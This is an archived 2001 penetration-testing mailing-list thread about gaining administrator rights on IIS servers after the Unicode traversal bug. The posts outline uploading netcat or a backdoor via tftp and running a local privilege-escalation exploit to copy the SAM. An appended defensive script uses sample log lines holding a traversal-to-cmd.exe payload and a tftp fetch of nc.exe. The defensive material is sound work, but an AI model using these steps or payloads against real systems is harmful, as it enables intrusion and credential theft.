Penetration Testing mailing list archives

Re: [PEN-TEST] Expand right under Win2K


From: Complx1 * <complx1 () HUSHMAIL COM>
Date: Tue, 9 Jan 2001 20:10:59 -0800

maybe I'm mistaken, but the answers don't seem to match the question.
then again, it could be the skill of others clouding my understanding.
-understanding is relative
nonetheless

On recent pen tests this subject has been a major issue for two reasons.
#1) Unicode is still un-aged as a vulnerability
#2) it does not allow full compromise in a one-two step like RDS

I regret I cannot offer a fully working scenario, because I do not have one
as of yet.  I would refrain from installing bo2k under all circumstances for
the simple reason that any competent admin would have antivirus software
running on the target server.
Assuming weak firewall or no firewall, service enumeration could easily
eliminate this possibility for those who might travel that route.
I have tested cmdasp.asp internally, and found it a simple but *amazing*
tool.  It does not offer admin/system/authority level commands as far as
I know or have experienced.

I have put together a scenario in notes, to test in the future or at the first
available time. I have tested once in a full pen test (only once) but the results
were negative.  There was every indication that it was a success, so this
made it a high priority for internal testing at next available time in a controlled
environment. (my home lab is all w2k/nix and IIS5 =((

(babble mode off)

Scenario requirements:
Target server = NT 4.0 , IIS 4.0 , (patch levels will vary results)
Remote Penetration exploit = unicode web folder traversal
Local Escalation Exploit =  LPC port request

Using the Unicode exploit on the target NT 4.0 IIS 4.0 server we use the extended
information, tftp to upload your choice of netcat or the cmdasp.asp.
Both spawned from Unicode, via IUSR_blah permissions of the web process.

When netcat port is open , or cmdasp allows execution, issue tftp and
upload the LPC PORT local exploit to the target server.

(information below taken from nmrc.org)
The LPC exploit is identified by Microsoft as MS00-003

Their description of the exploit is as follows:
====================================
Todd Sabin's exploit of the bug mentioned in MS00-003
in January of 2000. Allows command execution as
SYSTEM by a local user. Works on NT up through SP6.

The compiled executable can be found at
http://nmrc.org/files/nt/hk-0.1.zip

The Microsoft information is here
http://www.microsoft.com/technet/security/bulletin/ms00-003.asp

In the legit pen test, I issued a copy of the SAM to webpub via the LPC exploit.
The output of the exploit was positive; however the file did not exist afterwards.
Since this was a remote test, I gave it one shot, and decided to keep moving
down the list to the other bucket of toys they had for me to play with.

But this is the working model I'm testing.. if anyone has a positive result or
comment, even flame.   do your thing.. it's a free world.

.complx1

At Tue, 9 Jan 2001 16:17:53 -0500, Paul Cardon <paul () MOQUIJO COM> wrote:


Charlie Rhodes wrote:

We have a Win2K where we have access to a cmd.exe with the rights of the
web-server and we would like to obtain administrator rights. Also we
don't have the rights to read the SAM files.
We tried the well-known methods under Win NT 4.0 (like breaknt.exe,
read from raw device) in vain.

    Do you have network (ftp) access?  or floppy access?
http://www.bo2k.com should do the trick.  You'll probably want to configure
the server part off the machine, then load it on.

This is the second time this question has been asked on the list and
almost everybody misunderstands the problem.  Let me restate it:

Suppose a pen-tester has used the IIS Unicode vulnerability to download
a back door such as a netcat listener to the target Win2K server and now
has a remote cmd shell.  At this point the remote shell is running with
IUSR_<MACHINE> privilege since that is the privilege level that the
Unicode vulnerability provides.

Now, how does the pen-tester elevate privilege to Administrator?

Any software that is downloaded (tftp, ftp, whatever) through the remote
command shell will only run with IUSR_<MACHINE> privilege.  Why do
people think that downloading BO2K, netcat, or some such will magically
elevate privilege?  It doesn't.

The only things that are possible are:

1)  There is a known privilege escalation vulnerability that can be
exploited with local unprivileged access.  The attacker can download and
run that code to gain Administrator access.

2)  Brute force attack against accounts with local Administrator privilege.

3)  Look for vulnerabilities in other systems that the web server can
talk to.  Some of those may expose Domain accounts with Administrator
privilege on the web server or other systems that are trusted by the web
server.

There are others but Win2K does limit some of the nicer possibilities
that existed with NT.

-paul
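From the defender's side of the scenario both posts describe (overlong-UTF-8 traversal into cmd.exe, then tftp pulled in through the web process), here is an added log-review example that is not part of either message. It is my own code; the IIS W3C log lines are constructed samples, and the field layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is assumed. It flags a request when a lenient decoder that accepts overlong UTF-8 (the decoding flaw behind the Unicode bug) yields a traversal that a strict decoder does not, and when the decoded path or query reaches cmd.exe or tftp.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C extended log lines (not from the thread); fields are
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2001-01-09 20:10:59 192.0.2.10 GET /default.htm - 200
2001-01-09 20:11:03 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-01-09 20:11:09 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.77+GET+nc.exe 502
2001-01-09 20:12:00 192.0.2.10 GET /images/logo.gif - 304
"""

def lenient_utf8(data: bytes) -> str:
    """Decode like the flawed decoder did: accept overlong 2-byte sequences."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))  # no shortest-form check
            i += 2
        else:
            out.append(chr(b))  # ASCII or a stray byte, kept as Latin-1
            i += 1
    return "".join(out)

def analyse(line: str):
    """Return (client_ip, findings) for one log line, or None if it looks clean."""
    f = line.split()
    if len(f) < 7 or f[0].startswith("#"):
        return None
    ip, stem, query = f[2], f[4], f[5]
    raw = unquote_to_bytes(stem)
    strict = raw.decode("utf-8", "replace")   # what a correct decoder sees
    lenient = lenient_utf8(raw)               # what the vulnerable decoder saw
    path = lenient.replace("\\", "/")
    findings = []
    if re.search(r"(^|/)\.\.(/|$)", path):
        findings.append("overlong-utf8 traversal" if lenient != strict else "traversal")
    if re.search(r"/cmd\.exe$", path, re.I):
        findings.append("cmd.exe via web process")
    if re.search(r"\btftp\b", query, re.I):
        findings.append("tftp invoked from web request")
    return (ip, findings) if findings else None

def scan(log_text: str):
    """Return the suspicious entries in a block of log text, in order."""
    return [r for r in map(analyse, log_text.splitlines()) if r]
```

Because the traversal check compares lenient against strict decoding rather than matching fixed strings, it also catches overlong forms other than the one in the sample, while legitimate two-byte UTF-8 in a path (an accented file name) decodes identically both ways and is not flagged.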
